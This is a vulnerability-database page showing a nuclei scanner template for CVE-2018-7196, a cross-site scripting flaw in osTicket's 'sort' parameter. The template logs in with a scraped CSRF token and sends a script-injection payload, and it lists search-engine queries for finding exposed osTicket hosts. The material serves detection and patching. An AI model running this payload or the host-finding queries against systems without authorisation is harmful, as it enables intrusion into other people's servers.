Lucene search
K

osTicket < 1.10.2 - Cross-Site Scripting

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 35 Views

osTicket < 1.10.2 Cross-Site Scripting vulnerability allows remote attackers to inject arbitrary web script or HTML via the "sort" parameter. Upgrade to mitigate

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Enhancesoft osTicket cross-site scripting vulnerability (CNVD-2018-07903)
29 Mar 201800:00
cnvd
CVE
CVE-2018-7196
27 Mar 201817:00
cve
Cvelist
CVE-2018-7196
27 Mar 201817:00
cvelist
EUVD
EUVD-2018-18938
7 Oct 202500:30
euvd
NVD
CVE-2018-7196
27 Mar 201817:29
nvd
Prion
Cross site scripting
27 Mar 201817:29
prion
id: CVE-2018-7196

info:
  name: osTicket < 1.10.2 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Cross-site scripting (XSS) vulnerability in /scp/index.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the "sort" parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
  remediation: |
    Upgrade osTicket to later version to mitigate this vulnerability.
  reference:
    - https://blog.securityevaluators.com/vulnerabilities-found-in-popular-ticketing-system-dd273bda229c
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7196
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-7196
    cwe-id: CWE-79
    epss-score: 0.02482
    epss-percentile: 0.82505
    cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: osticket
    product: osticket
    shodan-query: title:"osTicket"
    fofa-query: title="osticket"
    google-query: intitle:"osticket"
  tags: cve,cve2018,osticket,xss,authenticated,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /scp/login.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "osticket")'
        internal: true

    extractors:
      - type: regex
        name: csrftoken
        part: body
        group: 1
        regex:
          - '__CSRFToken__" value="(.*?)"'
        internal: true

  - raw:
      - |
        POST /scp/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        __CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1

      - |
        GET /scp/index.php?sort="><script>alert(document.domain);</script>&dir=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "\"><script>alert(document.domain);</script>")'
          - 'contains(header, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402206dca5493e3f45aae471055593a64f559060ea0dae9481c6fcc5a5f6570ea7e6702201d3b4c4621c74d3dca1cf1fcbb0b6baa98d7d976cf002bf45a715c7f4db5a702:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 36.1
EPSS0.02482
35